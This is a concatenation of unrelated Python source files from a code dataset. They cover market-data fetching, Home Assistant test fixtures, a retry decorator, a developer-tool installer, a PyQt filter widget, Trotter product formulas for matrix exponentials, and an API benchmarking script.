                return result if len(result) > 0 else ['no fing data']
            elif 'error' in response.json():
                return False
        except Exception:
            # Fixed: was a bare `except:`; KeyboardInterrupt now propagates.
            return False

    def get_candles(self, symbol, time_frame, start, end):
        """Yield all candles between *start* and *end* ('YYYY-MM-DD HH:MM:SS').

        Pages through the API in self.limit-sized windows; a failed page is
        retried every 2 seconds indefinitely.
        """
        duration = self.get_duration_candle(time_frame) * self.limit
        start = self.time_to_unix_time(start)
        end = self.time_to_unix_time(end)
        while start <= end:
            calc_end = start + duration - 1
            calc_end = end + 1 if end <= calc_end else calc_end
            candles = self.get_candle(symbol=symbol, limit=self.limit, time_frame=time_frame, start=start, end=calc_end)
            while not candles:
                candles = self.get_candle(symbol=symbol, limit=self.limit, time_frame=time_frame, start=start, end=calc_end)
                time.sleep(2)
            for candle in candles:
                yield candle
            start += duration
def put_order(**kwargs):
    """Stub order-placement hook: accepts any keywords and reports success."""
    _ = kwargs  # parameters are intentionally ignored in this stub
    return True
| StarcoderdataPython |
3359849 | """Fixtures for websocket tests."""
import pytest
from homeassistant.setup import async_setup_component
from homeassistant.components.websocket_api.http import URL
from homeassistant.components.websocket_api.auth import TYPE_AUTH_REQUIRED
from . import API_PASSWORD
@pytest.fixture
def websocket_client(hass, hass_ws_client):
    """Create a websocket client."""
    return hass.loop.run_until_complete(hass_ws_client(hass))

@pytest.fixture
def no_auth_websocket_client(hass, loop, aiohttp_client):
    """Websocket connection that requires authentication.

    Yields a connected but unauthenticated websocket and closes it on
    teardown if the test did not.
    """
    assert loop.run_until_complete(
        async_setup_component(hass, 'websocket_api', {
            'http': {
                'api_password': API_PASSWORD
            }
        }))
    client = loop.run_until_complete(aiohttp_client(hass.http.app))
    ws = loop.run_until_complete(client.ws_connect(URL))
    auth_ok = loop.run_until_complete(ws.receive_json())
    # The server must demand authentication before anything else.
    assert auth_ok['type'] == TYPE_AUTH_REQUIRED
    yield ws
    if not ws.closed:
        loop.run_until_complete(ws.close())
| StarcoderdataPython |
def function_1():
    # NOTE(review): function_1 and function_2 call each other with no base
    # case, so executing either recurses until RecursionError. This file
    # looks like a fixture for call-graph analysis rather than runnable
    # code -- confirm before "fixing" the recursion.
    function_2()
    function_3()
    return

def function_2():
    function_3()
    function_1()
    return

def function_3():
    # Leaf function: terminates immediately.
    return
# def function_4():
# function_5()
# return
# def function_5():
# function_6()
# function_7()
# return
# def function_6():
# function_5()
# function_7()
# return
# def function_7():
# return
class class1:
    def __init__(self):
        self.a = 1
    def method_1():
        # NOTE(review): missing `self`; only callable as class1.method_1()
        # (as main() does below), not on an instance.
        function_1()

def main():
    class_instance = class1()
    # class1.class2.class3.method_1()
    class1.method_1()  # triggers the function_1/function_2 recursion
    for i in range(2):
        a = 1
| StarcoderdataPython |
1683835 | # -*- coding: utf-8 -*-
# This space deliberately left almost blank.
| StarcoderdataPython |
3364661 | <filename>book/src/ch05/src/decorator_parametrized_1.py
"""Clean Code in Python - Chapter 5: Decorators
Parametrized decorators using functions
"""
from functools import wraps
from typing import Sequence, Optional
from decorator_function_1 import ControlledException
from log import logger
_DEFAULT_RETRIES_LIMIT = 3


def with_retry(
    retries_limit: int = _DEFAULT_RETRIES_LIMIT,
    allowed_exceptions: Optional[Sequence[type]] = None,
):
    """Decorator factory: retry the wrapped callable on selected exceptions.

    Parameters
    ----------
    retries_limit:
        Maximum number of attempts; must be at least 1.
    allowed_exceptions:
        Exception *classes* that trigger a retry (the original annotation
        said Sequence[Exception], i.e. instances, which is wrong for an
        ``except`` clause). Defaults to (ControlledException,). Any other
        exception propagates immediately.

    Raises
    ------
    ValueError
        If ``retries_limit`` < 1. Previously this silently produced
        ``raise None`` (a TypeError) at call time.
    """
    if retries_limit < 1:
        raise ValueError("retries_limit must be at least 1")
    allowed_exceptions = allowed_exceptions or (ControlledException,)  # type: ignore

    def retry(operation):
        @wraps(operation)
        def wrapped(*args, **kwargs):
            last_raised = None
            for _ in range(retries_limit):
                try:
                    return operation(*args, **kwargs)
                except allowed_exceptions as e:
                    logger.warning(
                        "retrying %s due to %s", operation.__qualname__, e
                    )
                    last_raised = e
            # All attempts failed: surface the most recent allowed error.
            raise last_raised

        return wrapped

    return retry
| StarcoderdataPython |
4803549 | <filename>my_page.py
from time import sleep
from selenium.webdriver.common.by import By
from constant import back
def my_page_testing(driver):
    """Appium UI walk-through of the app's "my page" tab.

    Visits cloud space, recycle bin (permanently deletes the first entry),
    account settings, usage guide, feedback and about/version screens,
    then returns to the first bottom-nav tab. Assumes the app is on its
    home screen when called.
    """
    # Open the "my page" tab (4th item of the bottom navigation bar).
    driver.find_element(By.XPATH,
                        "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.RelativeLayout[3]").click()
    sleep(1)
    print("========my page testing started========")
    print("testing the cloud...")
    # Open the cloud-space screen.
    driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_cloud_space").click()
    driver.find_element(By.ID, "com.iflytek.zhiying:id/iv_help").click()
    sleep(5)
    back(driver)
    driver.find_element(By.ID, "com.iflytek.zhiying:id/iv_cloud_list").click()
    sleep(5)
    back(driver)
    back(driver)
    print("cloud testing done!")
    print("now test the recycle bin...")
    driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_recycle_bin").click()
    # Open the context menu of the first recycle-bin entry.
    driver.find_element(By.XPATH,
                        "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.view.ViewGroup/android.widget.RelativeLayout[2]/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[1]/android.widget.LinearLayout[2]/android.widget.ImageView").click()
    print("deleting the file")
    # Permanently delete and confirm the dialog.
    driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_pop_delete").click()
    driver.find_element(By.ID, "com.iflytek.zhiying:id/btn_selectPositive").click()
    back(driver)
    print("deleted!")
    print("testing other entries...")
    driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_account_setting").click()
    back(driver)
    print("setting done!")
    driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_product_use_guidance").click()
    sleep(2)
    back(driver)
    print("guide done!")
    driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_feedback").click()
    sleep(2)
    back(driver)
    print("feedback done!")
    el12 = driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_about")
    el12.click()
    el13 = driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_version_update")
    el13.click()
    back(driver)
    back(driver)
    print("about done!")
    print("========my page done!========")
    # Return to the first bottom-nav tab.
    driver.find_element(By.XPATH,
                        "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.RelativeLayout[1]").click()
| StarcoderdataPython |
1797129 | <gh_stars>0
from ovim.log import logger
from urllib import request
import json
import tarfile
import tempfile
import os
class UbuntuRunner:
    """Install developer tooling (universal-ctags via apt, fzf from GitHub
    releases) on an Ubuntu host."""

    homedir = os.path.abspath(os.getenv('HOME'))
    local_bin = os.path.join(homedir, '.local', 'bin')

    @classmethod
    def check_env(cls):
        """Raise RuntimeError unless curl is available on PATH."""
        # os.system returns a non-zero status when the command fails.
        if os.system("curl --version"):
            raise RuntimeError('curl is not exist.')

    @classmethod
    def install_fzf(cls):
        """Download the latest fzf release binary into ~/.local/bin."""
        with os.popen("uname -sm") as f:
            arch = f.read()
        arch = arch.strip()
        logger.info(arch)
        # Map `uname -sm` output to fzf's release-asset suffix.
        # Fixed two bugs: (1) the armv7 suffix was misspelled
        # "linux_amdv7", producing a 404; (2) the generic endswith("64")
        # test ran first, so "aarch64" fell into the amd64 branch and
        # downloaded an x86 binary. ARM variants are now checked first.
        if "aarch64" in arch or "armv8" in arch:
            arch = "linux_arm64"
        elif "armv7" in arch:
            arch = "linux_armv7"
        elif "armv6" in arch:
            arch = "linux_armv6"
        elif "armv5" in arch:
            arch = "linux_armv5"
        elif arch.endswith("64"):
            arch = "linux_amd64"
        fzf_release_url = "https://api.github.com/repos/junegunn/fzf/releases/latest"
        resp = request.urlopen(fzf_release_url)
        j = resp.read().decode()
        j = json.loads(j)
        latest_tag_name = j['tag_name']
        file_url = "https://github.com/junegunn/fzf/releases/download/{}/fzf-{}-{}.tar.gz".format(
            latest_tag_name, latest_tag_name, arch)
        logger.info("download fzf...")
        # Buffer the tarball in a temp file so tarfile can seek in it.
        resp = request.urlopen(file_url)
        temp_file = tempfile.TemporaryFile()
        temp_file.write(resp.read())
        resp.close()
        temp_file.seek(0)
        tfile = tarfile.open(fileobj=temp_file, mode='r')
        os.makedirs(cls.local_bin, exist_ok=True)
        tfile.extract('fzf', cls.local_bin)
        logger.info("fzf extract to {}".format(cls.local_bin))
        tfile.close()
        temp_file.close()

    @classmethod
    def install_ctags(cls):
        """apt-install universal-ctags if it is not already installed."""
        with os.popen("apt list --installed universal-ctags") as f:
            r = f.read()
        logger.info(r)
        if "universal-ctags" not in r:
            os.system("apt-get install universal-ctags -y")

    @classmethod
    def run(cls):
        """Entry point: install ctags then fzf, logging any failure."""
        try:
            logger.info("ubuntu runner start.")
            cls.install_ctags()
            cls.install_fzf()
        except Exception as e:
            logger.error("UbuntuRunner occured error {}".format(e))
| StarcoderdataPython |
3302972 | """
RDB 2015
User Interface
Filtering Widget
Author: <NAME>
"""
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QPushButton, QLabel,
QDialog)
from copy import deepcopy
from datetime import timezone
from .filterdialog import FilterDialog
class FilteringWidget(QWidget):
    """Row widget showing the active measurement filter with edit/clear buttons.

    Emits ``filterChanged(dict)`` whenever the filter is replaced.
    """
    filterChanged = pyqtSignal(dict)
    @staticmethod
    def filterToText(filter_):
        """Render a filter dict as a human-readable (Czech) summary line."""
        def appendText(original, additional):
            # Comma-join, avoiding a leading separator on the first item.
            if not original:
                return additional
            return original + ', ' + additional
        if not filter_:
            return "(žádný)"
        text = ""
        if 'block' in filter_:
            text = appendText(text, 'Skupina měření: %s' % filter_['block'])
        if 'device' in filter_:
            text = appendText(text, 'Přístroj: %s' % filter_['device'])
        if 'unit' in filter_:
            text = appendText(text, 'Jednotka: %s' % filter_['unit'])
        # Datetimes are stored in UTC and shown in local time.
        if 'start_datetime' in filter_:
            text = appendText(text, 'Od: %s' % \
                utc_to_local(filter_['start_datetime']).
                strftime('%Y-%m-%d %H:%M:%S'))
        if 'end_datetime' in filter_:
            text = appendText(text, 'Do: %s' % \
                utc_to_local(filter_['end_datetime']).
                strftime('%Y-%m-%d %H:%M:%S'))
        if 'loc_x' in filter_:
            # loc_y/loc_tol may be absent; the whole location entry is
            # skipped in that case.
            try:
                text = appendText(text, 'Lokace: (%s, %s, +-%s)' %
                    (filter_['loc_x'], filter_['loc_y'], filter_['loc_tol']))
            except KeyError:
                pass
        if 'deviated_values' in filter_ and \
            filter_['deviated_values'] == True:
            text = appendText(text, 'Mimo odchylku')
        return text
    def __init__(self, parent=None):
        super(FilteringWidget, self).__init__(parent)
        self._filter = {}
        self.label = QLabel(self)
        self.label.setWordWrap(True)
        self.label.setText(self.filterToText(self._filter))
        self.changeFilter = QPushButton(self)
        self.changeFilter.setText("Upravit filtr")
        self.changeFilter.clicked.connect(self.on_changeFilter_clicked)
        self.removeFilter = QPushButton(self)
        self.removeFilter.setText("Smazat filtr")
        self.removeFilter.clicked.connect(self.on_removeFilter_clicked)
        layout = QHBoxLayout()
        layout.addWidget(QLabel("Aktivní filtr: "))
        layout.addWidget(self.label)
        layout.setStretch(1, 1)
        layout.addWidget(self.changeFilter)
        layout.addWidget(self.removeFilter)
        layout.setContentsMargins(0, 0, 0, 0)
        self.setLayout(layout)
        self.setMinimumHeight(60)
    @pyqtSlot()
    def on_changeFilter_clicked(self):
        # Open the modal filter editor pre-filled with the current filter.
        # NOTE(review): assumes setOptions() was called first; self.options
        # is otherwise unset and this raises AttributeError.
        filterDialog = FilterDialog()
        filterDialog.initControls(self.options, self._filter)
        if filterDialog.exec_() == QDialog.Accepted:
            self.setFilter(filterDialog.filter())
    @pyqtSlot()
    def on_removeFilter_clicked(self):
        self.setFilter({})
    def setFilter(self, filter_):
        """Replace the active filter and notify listeners."""
        self._filter = filter_
        self.onFilterChange()
    def setOptions(self, options):
        """Store the option lists the filter dialog offers."""
        self.options = options
    def onFilterChange(self):
        # Refresh the summary label and emit the change signal.
        self.label.setText(self.filterToText(self._filter))
        self.filterChanged.emit(self._filter)
    def filter(self):
        """Return the active filter dict."""
        return self._filter
def utc_to_local(utc_dt):
    """Interpret a naive datetime as UTC and convert it to local time."""
    as_utc = utc_dt.replace(tzinfo=timezone.utc)
    return as_utc.astimezone(tz=None)
if __name__ == '__main__':
    # Manual smoke test: show the widget with sample options and a
    # pre-applied filter.
    import sys
    from PyQt5.QtWidgets import QApplication
    from datetime import datetime
    app = QApplication(sys.argv)
    options = {'block': [1, 2, 3, 4, 5], \
               'device': ['rm2-x', 'zc-3d', 'qap'], \
               'unit': ['Hz', 'A', 'm^2']}
    filter_ = {'block': 4, 'unit': 'Hz', 'deviated_values': True, \
               'start_datetime': datetime(2015,5,7,10)}
    widget = FilteringWidget()
    widget.setOptions(options)
    widget.setFilter(filter_)
    widget.show()
    sys.exit(app.exec_())
| StarcoderdataPython |
1601740 | # thread class for updating tweets in the background
import time
import threading
class TweetUpdateThread(threading.Thread):
    ''' thread class to fetch tweets in the background '''

    def __init__(self, cli_object, function, waittime):
        ''' At initialization some local variables are set:
            waittime = seconds to wait between tweet fetches
            cli = the cli object on whose behalf updates run
            function = the update callable invoked every interval
            endme = flag polled once per second to stop the thread
            counter = seconds slept since the last update
        '''
        threading.Thread.__init__(self)
        self.waittime = waittime
        self.cli = cli_object
        self.function = function
        self.endme = False
        self.counter = 0

    def stop(self):
        ''' Request a cooperative stop of the thread.

        Fixed: the original called threading.Thread.__stop(self), which is
        name-mangled inside this class and does not exist in Python 3, so
        stop() always raised AttributeError. Stopping now sets the endme
        flag, identical to setend().
        '''
        self.endme = True

    def run(self):
        ''' Run until endme is set, invoking the update function every
        `waittime` seconds. Sleeping in 1-second slices keeps shutdown
        latency near one second instead of a full waittime interval
        (worst case).

        Fixed: the original ignored the stored self.function and always
        called self.cli.do_hello("") directly.
        '''
        while self.endme == False:
            if self.counter == self.waittime:
                self.counter = 0
                self.function()
            else:
                self.counter = self.counter + 1
            time.sleep(1)

    def setend(self):
        ''' Interface to set the end of the thread '''
        self.endme = True
1777633 | from abc import ABC, abstractmethod
from typing import List
from mpmath import eye, mpc, matrix
from mpmath import expm as mp_expm
from numpy import ndarray, identity
from numpy.linalg import matrix_power
from scipy.linalg import expm as scipy_expm
from .matrices import Matrix
class ProductFormula(ABC):
    """Base class for product-formula approximations of e^{-i sum(H_j) t}.

    Subclasses implement __call__ and set_steps; the helpers here dispatch
    between mpmath matrices and numpy ndarrays.
    """

    @abstractmethod
    def __call__(self, time: float, matrices: List[Matrix]) -> Matrix:
        """Return an approximation of e^{-i * sum(matrices) * time}."""
        ...

    @abstractmethod
    def set_steps(self, steps: int) -> None:
        """Set the number of steps used"""
        ...

    def _ensure_dimensions(self, matrices: List[Matrix]) -> None:
        """Make sure that matrices are square and have the same dimensions.

        NOTE(review): only equality of dimensions is asserted; squareness
        itself is not checked.
        """
        if isinstance(matrices[0], matrix):
            rows, cols = matrices[0].rows, matrices[0].cols
            assert all(A.rows == rows and A.cols == cols for A in matrices), (
                "Matrices must be of the same dimension")
        elif isinstance(matrices[0], ndarray):
            rows, cols = matrices[0].shape
            assert all(A.shape == (rows, cols) for A in matrices), (
                "Matrices must be of the same dimension")
        else:
            # Fixed: this message (and the three below) was missing the
            # f-prefix, so the literal text "{type(...)}" was displayed.
            raise TypeError(f"Unknown matrix type: {type(matrices[0])}. "
                            "Need mp.matrix or np.ndarray.")

    def _eye(self, matrices: List[Matrix]) -> Matrix:
        """Return the identity matrix matching the matrices.
        In the sense that
        >>> matrices[0] @ self._eye(matrices) == matrices[0]
        True
        (So the type and dimension match)
        Works for square mp.matrix and 2D square np.ndarray.
        """
        if isinstance(matrices[0], matrix):
            rows, cols = matrices[0].rows, matrices[0].cols
            return eye(rows)
        elif isinstance(matrices[0], ndarray):
            rows, cols = matrices[0].shape
            return identity(rows)
        else:
            raise TypeError(f"Unknown matrix type: {type(matrices[0])}. "
                            "Need mp.matrix or np.ndarray.")

    def _expm(self, s: complex, M: Matrix) -> Matrix:
        """Compute e^(s*M) with the appropriate method
        Either scipy.linalg.expm or mp.expm, depending on
        the type of M.
        """
        if isinstance(M, ndarray):
            return scipy_expm(complex(s) * M)
        elif isinstance(M, matrix):
            # use same method as scipy.linalg.expm
            return mp_expm(s * M, method='pade')
        else:
            # Fixed: referenced matrices[0], which does not exist here.
            raise TypeError(f"Unknown matrix type: {type(M)}. "
                            "Need mp.matrix or np.ndarray.")

    def _matpow(self, M: matrix, s: int) -> Matrix:
        """Compute M**s with the type-appropriate method"""
        if isinstance(M, ndarray):
            return matrix_power(M, s)
        elif isinstance(M, matrix):
            # use same method as scipy.linalg.expm
            return M**s
        else:
            # Fixed: referenced matrices[0], which does not exist here.
            raise TypeError(f"Unknown matrix type: {type(M)}. "
                            "Need mp.matrix or np.ndarray.")

    @abstractmethod
    def __str__(self) -> str:
        ...
class TrotterFirstOrder(ProductFormula):
    r"""Approximate e^{-i \sum H_j t} to first order.
    Computes e^{-i \sum H_j t} as (\prod_{j=1}^J e^{-i H_j t/m})^m.
    """
    def __init__(self, steps: int = 0) -> None:
        """
        Parameters
        ----------
        steps: int
            Number of timesteps taken (m).
        """
        self.m = steps
    def set_steps(self, steps: int) -> None:
        """
        Parameters
        ----------
        steps: int
            Number of timesteps taken (m).
        """
        self.m = steps
    def __call__(self, time: float, matrices: List[Matrix]) -> Matrix:
        r"""Approximate e^{-i * sum(matrices) * time} to first order.
        No optimization for len(matrices) == 2 (symmetric Strang splitting).
        """
        self._ensure_dimensions(matrices)
        result = self._eye(matrices)
        # m == 0 means "no evolution": return the identity.
        if self.m == 0:
            return result
        # NOTE(review): mpc() makes the timestep an mpmath complex even on
        # the numpy path; _expm converts it back via complex(s), so this
        # works but mixes number types -- confirm it is intentional.
        t_prime = mpc(time) / self.m
        for H in matrices:
            result = result @ self._expm(-1j * t_prime, H)
        # One first-order step, repeated m times.
        return self._matpow(result, self.m)
    def __str__(self) -> str:
        return "T1"
class TrotterSecondOrder(ProductFormula):
    r"""Approximate e^{-i \sum H_j t} to second order.
    Computes e^{-i \sum H_j t} as
    ((\prod_{j=1}^J e^{-i H_j t/2m})(\prod_{j=J}^1 e^{-i H_j t/2m}))^m.
    """
    def __init__(self, steps: int = 0) -> None:
        """
        Parameters
        ----------
        steps: int
            Number of timesteps taken (m).
        """
        self.m = steps
    def set_steps(self, steps: int) -> None:
        """
        Parameters
        ----------
        steps: int
            Number of timesteps taken (m).
        """
        self.m = steps
    def __call__(self, time: float, matrices: List[Matrix]) -> Matrix:
        r"""Approximate e^{-i * sum(matrices) * time} to second order.
        No optimization for len(matrices) == 2 (symmetric Strang splitting).
        """
        self._ensure_dimensions(matrices)
        result = self._eye(matrices)
        if self.m == 0:
            return result
        if len(matrices) == 1:
            # Single term: the splitting is exact.
            # Fixed: was `self._expm(-1j * time * matrices[0])` -- a missing
            # comma made this a one-argument call, which raised TypeError
            # (_expm requires both the scalar and the matrix).
            return self._expm(-1j * time, matrices[0])
        t_prime = mpc(time) / (2 * self.m)
        # Forward sweep; the outermost factors take a double step so the
        # half-step boundary factors can be merged across the m repetitions
        # and re-split once outside the power below.
        result = result @ self._expm(-2j * t_prime, matrices[0])
        for H in matrices[1:-1]:
            result = result @ self._expm(-1j * t_prime, H)
        result = result @ self._expm(-2j * t_prime, matrices[-1])
        for H in reversed(matrices[1:-1]):
            result = result @ self._expm(-1j * t_prime, H)
        return (self._expm(1j * t_prime, matrices[0]) @
                self._matpow(result, self.m) @
                self._expm(-1j * t_prime, matrices[0]))
    def __str__(self) -> str:
        return "T2"
class ExactMatrixExponential(ProductFormula):
    r"""Compute e^{-i \sum H_j t} exactly"""
    def __init__(self) -> None:
        pass
    def set_steps(self, steps: int = 0) -> None:
        """Exact exponentiation doesn't use steps, arguments are ignored"""
        pass
    def __call__(self, time: float, matrices: List[Matrix]) -> Matrix:
        r"""Compute e^{-i * sum(matrices) * time} exactly by summing up matrices.
        """
        self._ensure_dimensions(matrices)
        # Exact reference result: exponentiate the full Hamiltonian sum.
        return self._expm(-1j * time, sum(matrices))
    def __str__(self) -> str:
        return "EX"
| StarcoderdataPython |
1708556 | <reponame>Arko98/Alogirthms
# Problem: https://leetcode.com/problems/k-diff-pairs-in-an-array/
class Solution:
    def findPairs(self, nums: List[int], k: int) -> int:
        """Count unique k-diff pairs (a, b) in nums with b - a == |k|.

        Set-based O(n) replacement for the original O(n^2) slice scans;
        the leftover debug ``print`` statements are removed. Negative k is
        folded to |k|, matching the original's symmetric +k/-k search.
        For k == 0 a pair requires a value that occurs at least twice.
        """
        diff = abs(k)
        if diff == 0:
            # Count values seen more than once.
            seen = set()
            duplicated = set()
            for num in nums:
                if num in seen:
                    duplicated.add(num)
                seen.add(num)
            return len(duplicated)
        unique = set(nums)
        return sum(1 for value in unique if value + diff in unique)
| StarcoderdataPython |
3353788 | #!/usr/bin/env python3
import base64
import json
import logging
import os
import random
import sqlite3
import sys
import time
import urllib.error
import urllib.request
import urllib.parse
logger = logging.getLogger(__name__)
_localhost_rooturl = 'http://localhost:8980'
# getAccountsPage(pageurl string, accounts set())
# return nextToken or None
def getAccountsPage(pageurl, accounts):
    """Fetch one page of /v2/accounts and add each address to *accounts*.

    Returns the pagination next-token, or None when the page is empty.
    HTTP and parse failures are logged and re-raised.
    """
    try:
        logger.debug('GET %r', pageurl)
        response = urllib.request.urlopen(pageurl)
    except urllib.error.HTTPError as e:
        logger.error('failed to fetch %r', pageurl)
        logger.error('msg: %s', e.file.read())
        raise
    except Exception as e:
        logger.error('%r', pageurl, exc_info=True)
        raise
    if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
        raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
    ob = json.loads(response.read())
    qa = ob.get('accounts',[])
    if not qa:
        return None
    for acct in qa:
        accounts.add(acct['address'])
    return ob.get('next-token')
# /v2/acccounts
def getAccountList(rooturl):
    """Page through /v2/accounts under *rooturl* and collect all addresses.

    Returns (accounts_set, report_dict) where the report records the first
    page URL, the account count, and the elapsed seconds.
    """
    rootparts = urllib.parse.urlparse(rooturl)
    rawurl = list(rootparts)
    accountsurl = list(rootparts)
    # urlparse tuple indices: [2] = path, [4] = query string.
    accountsurl[2] = os.path.join(rawurl[2], 'v2', 'accounts')
    query = {}
    accounts = set()
    start = time.time()
    nextToken = None
    reporturl = None
    while True:
        if nextToken is not None:
            query['next'] = nextToken
        if query:
            accountsurl[4] = urllib.parse.urlencode(query)
        pageurl = urllib.parse.urlunparse(accountsurl)
        if reporturl is None:
            reporturl = pageurl
        nextToken = getAccountsPage(pageurl, accounts)
        if nextToken is None:
            break
    dt = time.time() - start
    logger.info('account list: %d accounts in %0.2f seconds, %.1f /s', len(accounts), dt, len(accounts)/dt)
    return accounts, {'url':reporturl, 'accounts': len(accounts), 'seconds': dt}
# /v2/accounts/AAAAA
# TODO: multithreading, because a single client won't find the limit of the server
def accountRandom(rooturl, accounts, n=1000, minTime=None, maxTime=30):
    """Fetch single account records in random order and time the requests.

    Stops after *n* requests (but not before *minTime* seconds when given),
    or as soon as *maxTime* seconds have elapsed.  Returns a stats dict.
    NOTE(review): with an empty *accounts* iterable, ``dt`` is unbound and
    ``count/dt`` divides by zero at the log line -- confirm callers always
    pass a non-empty set.
    """
    rootparts = urllib.parse.urlparse(rooturl)
    rawurl = list(rootparts)
    accountsurl = list(rootparts)
    accounts = list(accounts)
    random.shuffle(accounts)
    count = 0
    start = time.time()
    reporturl = None  # first URL fetched, kept for the report
    for addr in accounts:
        accountsurl[2] = os.path.join(rawurl[2], 'v2', 'accounts', addr)
        pageurl = urllib.parse.urlunparse(accountsurl)
        if reporturl is None:
            reporturl = pageurl
        logger.debug('GET %s', pageurl)
        response = urllib.request.urlopen(pageurl)
        if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
            raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
        # don't actually care about content, just check that it parses
        json.loads(response.read())
        count += 1
        dt = time.time() - start
        # stop rules: quota reached (subject to any minimum runtime),
        # no quota but minimum runtime passed, or hard time cap exceeded
        if (n and (count >= n)) and (not minTime or (dt > minTime)):
            break
        if not n and minTime and (dt > minTime):
            break
        if maxTime and (dt > maxTime):
            break
    logger.info('account random: %d accounts in %0.2f seconds, %.1f /s', count, dt, count/dt)
    return {'url':reporturl, 'accounts': count, 'seconds': dt}
# /v2/transactions?addr=
# equivalent to
# /v2/accounts/AAAA/transactions
def accountRecents(rooturl, accounts, n=1000, minTime=None, maxTime=10, ntxns=1000):
    """Fetch up to *ntxns* recent transactions per account, in random order.

    Stop rules mirror accountRandom: quota *n* (subject to *minTime*), or
    the *maxTime* hard cap.  Returns a stats dict with account and
    transaction counts.
    NOTE(review): with an empty *accounts* iterable, ``dt`` is unbound and
    the log line divides by zero.
    """
    rootparts = urllib.parse.urlparse(rooturl)
    rawurl = list(rootparts)
    atxnsurl = list(rootparts)
    accounts = list(accounts)
    random.shuffle(accounts)
    count = 0
    txcount = 0
    start = time.time()
    reporturl = None
    for addr in accounts:
        # /v2/transactions?address=... is equivalent to
        # /v2/accounts/<addr>/transactions (see header comment)
        atxnsurl[2] = os.path.join(rawurl[2], 'v2', 'transactions')
        query = {'limit':ntxns, 'address':addr}
        atxnsurl[4] = urllib.parse.urlencode(query)
        pageurl = urllib.parse.urlunparse(atxnsurl)
        if reporturl is None:
            reporturl = pageurl
        logger.debug('GET %s', pageurl)
        response = urllib.request.urlopen(pageurl)
        if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
            raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
        ob = json.loads(response.read())
        txns = ob.get('transactions', [])
        txcount += len(txns)
        count += 1
        dt = time.time() - start
        # stop rules: see accountRandom
        if (n and (count >= n)) and (not minTime or (dt > minTime)):
            break
        if not n and minTime and (dt > minTime):
            break
        if maxTime and (dt > maxTime):
            break
    logger.info('account recent txns: %d accounts in %0.2f seconds, %.1f /s; %d txns, %.1f txn/s', count, dt, count/dt, txcount, txcount/dt)
    return {'url':reporturl, 'accounts': count, 'seconds': dt, 'txns': txcount}
# /v2/assets
def getAssets(rooturl):
    """Page through /v2/assets and collect {asset index: asset params}.

    Returns (assets dict, stats dict with the first URL fetched, asset
    count and elapsed seconds).
    """
    rootparts = urllib.parse.urlparse(rooturl)
    rawurl = list(rootparts)
    accountsurl = list(rootparts)
    accountsurl[2] = os.path.join(rawurl[2], 'v2', 'assets')
    query = {}
    assets = {}
    start = time.time()
    nextToken = None
    reporturl = None
    while True:
        if nextToken is not None:
            query['next'] = nextToken  # resume pagination
        if query:
            accountsurl[4] = urllib.parse.urlencode(query)
        pageurl = urllib.parse.urlunparse(accountsurl)
        if reporturl is None:
            reporturl = pageurl
        logger.debug('GET %s', pageurl)
        response = urllib.request.urlopen(pageurl)
        if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
            raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
        page = json.loads(response.read())
        for arec in page.get('assets', []):
            assets[arec['index']] = arec['params']
        nextToken = page.get('next-token')
        if nextToken is None:
            break
    dt = time.time() - start
    logger.info('asset list: %d assets in %0.2f seconds, %.1f /s', len(assets), dt, len(assets)/dt)
    return assets, {'url':reporturl, 'assets': len(assets), 'seconds': dt}
# /v2/assets/{asset-id}/transactions
# equivalent to
# /v2/transactions?asset-id=N
#
# To make fast:
# CREATE INDEX CONCURRENTLY IF NOT EXISTS txn_asset ON txn (asset, round, intra);
def assetTxns(rooturl, assets, n=1000, minTime=None, maxTime=10, ntxns=1000):
    """Fetch up to *ntxns* transactions per asset, assets in random order.

    Stop rules mirror accountRandom.  Returns a stats dict with asset and
    transaction counts.
    NOTE(review): with an empty *assets* dict, ``dt`` is unbound and the
    log line divides by zero.
    """
    rootparts = urllib.parse.urlparse(rooturl)
    rawurl = list(rootparts)
    atxnsurl = list(rootparts)
    assets = list(assets.keys())
    random.shuffle(assets)
    count = 0
    txcount = 0
    start = time.time()
    reporturl = None
    for assetid in assets:
        atxnsurl[2] = os.path.join(rawurl[2], 'v2', 'assets', str(assetid), 'transactions')
        query = {'limit':ntxns}
        atxnsurl[4] = urllib.parse.urlencode(query)
        pageurl = urllib.parse.urlunparse(atxnsurl)
        if reporturl is None:
            reporturl = pageurl
        logger.debug('GET %s', pageurl)
        response = urllib.request.urlopen(pageurl)
        if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
            raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
        ob = json.loads(response.read())
        txns = ob.get('transactions', [])
        txcount += len(txns)
        count += 1
        dt = time.time() - start
        # stop rules: see accountRandom
        if (n and (count >= n)) and (not minTime or (dt > minTime)):
            break
        if not n and minTime and (dt > minTime):
            break
        if maxTime and (dt > maxTime):
            break
    logger.info('asset txns: %d assets in %0.2f seconds, %.1f /s; %d txns, %.1f txn/s', count, dt, count/dt, txcount, txcount/dt)
    return {'url':reporturl, 'assets': count, 'seconds': dt, 'txns': txcount}
